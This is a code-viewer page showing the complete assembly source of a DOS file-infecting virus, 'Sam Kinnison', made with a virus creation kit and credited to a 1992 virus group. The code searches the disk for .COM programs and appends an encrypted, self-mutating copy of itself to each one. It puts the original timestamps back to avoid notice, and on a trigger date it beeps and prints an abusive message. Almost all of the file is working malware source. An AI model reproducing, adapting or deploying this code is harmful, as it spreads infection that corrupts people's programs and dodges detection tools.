📄 kinnison.asm
字号:
; KINNISON.ASM -- Sam Kinnison virus ; Created by Nowhere Man's Virus Creation Labratory v0.75; Written by Nowhere Manvirus_type equ 0code segment 'CODE' assume cs:code,ds:code,es:code,ss:code org 0100hmain proc nearflag: mov ah,0 nop nop jmp start ; Would be at start of victim nop nopstart: call find_offset ; Push IP on to stack, advance IPfind_offset: pop di ; DI holds old IP sub di,3 ; Adjust for length of CALL lea si,[di + start_of_code - start] ; SI points to code call encrypt_decrypt ; Decrypt the codestart_of_code label near push di ; Save DI mov si,offset flag ; SI points to flag bytes lea di,[di + new_jump - start] ; DI points to start of jump movsw ; Transfer two bytes movsw ; Transfer two bytes pop di ; Restore DI push di ; And save it for later lea si,[di + buffer - start]; SI points to old start mov di,0100h ; DI points to start of code movsw ; Transfer two bytes movsw ; Transfer two bytes movsw ; Transfer two bytes movsb ; Transfer final byte pop di ; Restore DI mov bp,sp ; BP points to stack sub sp,128 ; Allocate 128 bytes on stack mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack int 021h call get_day cmp ax,000Bh jne end00 call get_weekday cmp ax,0005h jne end00 mov cx,0003h call beepend00: xor ah,ah ; BIOS get time function int 01Ah test dx,0001h jne no_infection call search_filesno_infection: call get_day cmp ax,000Bh jne end01 call get_weekday cmp ax,0005h jne end01 lea si,[di + data00 - start] ; SI points to data call display_stringend01: pop dx ; DX holds original DTA address mov ah,01Ah ; DOS set DTA function int 021h mov sp,bp ; Deallocate local buffer mov di,0100h ; Push 0100h on to stack for push di ; return to main program xor ax,ax ; mov bx,ax ; mov cx,ax ; mov dx,ax ; Empty out the registers mov si,ax ; mov di,ax ; mov bp,ax ; ret ; Return to original programmain endpsearch_files proc near push bp ; Save BP mov bp,sp ; BP points to local buffer sub sp,64 ; Allocate 64 bytes on stack mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 64] ; SI points to 64-byte buffer int 021h mov ah,03Bh ; DOS change directory function lea dx,[di + root - start] ; DX points to root directory int 021h call traverse ; Start the traversal mov ah,03Bh ; DOS change directory function lea dx,[bp - 64] ; DX points to old directory int 021h mov sp,bp ; Restore old stack pointer pop bp ; Restore BP ret ; Return to callerroot db "\",0 ; Root directorysearch_files endptraverse proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first function mov cx,00010000b ; CX holds search attributes mov dx,offset all_files ; DX points to "*.*" int 021h jc leave_traverse ; Leave if no files presentcheck_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? jne another_dir ; If not, try again cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? je another_dir ;If so, keep going mov ah,03Bh ; DOS change directory function lea dx,[bp - 98] ; DX points to new directory int 021h call traverse ; Recursively call ourself mov ah,03Bh ; DOS change directory function lea dx,[di + up_dir - start]; DX points to parent directory int 021hanother_dir: mov ah,04Fh ; DOS find next function int 021h jnc check_dir ; If found check the fileleave_traverse: lea dx,[di + com_mask - start] ; DX points to "*.COM" call find_files ; Try to infect a filedone_searching: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to callerup_dir db "..",0 ; Parent directory nameall_files db "*.*",0 ; Directories to search forcom_mask db "*.COM",0 ; Mask for all .COM filestraverse endpfind_files proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack push dx ; Save file mask mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first file function mov cx,00100111b ; CX holds all file attributes pop dx ; Restore file maskfind_a_file: int 021h jc done_finding ; Exit if no files found call infect_file ; Infect the file! jnc done_finding ; Exit if no error mov ah,04Fh ; DOS find next file function jmp short find_a_file ; Try finding another filedone_finding: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to callerfind_files endpinfect_file proc near mov ah,02Fh ; DOS get DTA address function int 021h mov si,bx ; SI points to the DTA mov ax,04301h ; DOS set file attributes function xor cx,cx ; Clear all attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h mov ax,03D02h ; DOS open file function, r/w int 021h xchg bx,ax ; BX holds file handle mov ah,03Fh ; DOS read from file function mov cx,7 ; CX holds bytes to read (7) lea dx,[di + buffer - start]; DX points to buffer int 021h push si ; Save DTA address before compare mov byte ptr [di + set_carry - start],0 ; Assume we'll fail lea si,[di + buffer - start]; SI points to comparison buffer push di ; Save virus offset lea di,[di + new_jump - start] ; DI points to virus flag mov cx,4 ; CX holds number of bytes (4) rep cmpsb ; Compare the first four bytes pop di ; Restore DI je close_it_up ; If equal then close up mov byte ptr [di + set_carry - start],1 ; Success -- the file is OK cwd ; Zero CX _ Zero bytes from start mov cx,dx ; Zero DX / mov ax,04200h ; DOS file seek function, start int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h sub ax,7 ; Prepare for JMP mov word ptr [di + new_jump + 5 - start],ax ; Construct JMP for later call encrypt_code ; Make an encrypted copy of ourself mov ah,040h ; DOS write to file function mov cx,finish - start ; CX holds virus length lea dx,[di + finish - start] ; DX points to encrypted copy int 021h cwd ; Zero DX _ Zero bytes from start mov cx,dx ; Zero CX / mov ax,04200h ; DOS file seek function, start int 021h mov ah,040h ; DOS write to file function mov cx,7 ; CX holds bytes to write (7) lea dx,[di + new_jump - start] ; DX points to the jump we made int 021hclose_it_up: pop si ; Restore DTA address mov ax,05701h ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h mov ah,03Eh ; DOS close file function int 021h mov ax,04301h ; DOS set file attributes function xor ch,ch ; Clear CH for file attribute mov cl,[si + 015h] ; CX holds file's old attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021hinfection_done: cmp byte ptr [di + set_carry - start],1 ; Set carry flag if failed ret ; Return to callerset_carry db ? ; Set-carry-on-exit flagbuffer db 5 dup (090h),0CDh,020h ; Buffer to hold test datanew_jump db 4 dup (?),0E9h,?,? ; New jump to virusinfect_file endpbeep proc near
jcxz beep_end ; Exit if there are no beeps
mov ax,0E07h ; BIOS display char., BEL
beep_loop: int 010h ; Beep
loop beep_loop ; Beep until --CX = 0
beep_end: ret ; Return to caller
beep endpdisplay_string proc near
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend: ret ; Return to caller
display_string endpget_day proc near
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_day endpget_weekday proc near
mov ah,02Ah ; DOS get date function
int 021h
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_weekday endpdata00 db "DIE BITCH!!!!! AHHHHHHHH!!!!!!!",13,10,0
vcl_marker db "[VCL]",0 ; VCL creation markernote db "Dedicated to the memory of" db " Sam Kinnison 1954-1992",0 db "[Kinnison]",0 db "Nowhere Man, [NuKE] '92",0encrypt_code proc near push bx ; Save BX push di ; Save DI lea si,[di + encrypt_decrypt - start] ; SI points to encryption code xor ah,ah ; BIOS get time function int 01Ah or dx,1 ; Insure we never get zero mov word ptr [si + 5],dx ; Low word of timer is new keyalter_flag: mov al,0 ; AL holds alteration flag inc byte ptr [di + (alter_flag + 1) - start] ; Toggle alteration flag test al,1 ; Is bit one set? jne check_nop ; If not then don't toggle xor byte ptr [si],0110b ; Change all BPs in startup code xor byte ptr [si + 4],010b ; to BXs, and vice-versa xor byte ptr [si + 7],0110b ;check_nop: test al,2 ; Is bit two set? jne do_encryption ; If not then don't toggle mov ax,word ptr [si + 7] ; AX holds INC/NOP xchg ah,al ; Exchange position of INC and NOP mov word ptr [si + 7],ax ; Put the word backdo_encryption: mov si,di ; SI points to start of code lea di,[di + finish - start] ; DI points past code mov cx,(finish - start) / 2 ; CX holds words to transfer rep movsw ; Copy the code past the end pop di ; Restore DI lea si,[di + (finish + (start_of_code - start)) - start] ; SI points to code to encrypt call encrypt_decrypt ; Encrypt the code pop bx ; Restore BX ret ; Return to callerencrypt_code endpeven ; Must be on an even boundryend_of_code label nearencrypt_decrypt proc near mov bp,end_of_code - start_of_code - 2 ; BP holds length of codexor_loop: db 081h,032h,00h,00h ; XOR a word with the key dec bp ; Do the next byte nop ; Used to throw off detectors jne xor_loop ; Repeat until we're done ret ; Return to callerencrypt_decrypt endpfinish label nearcode ends end main⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -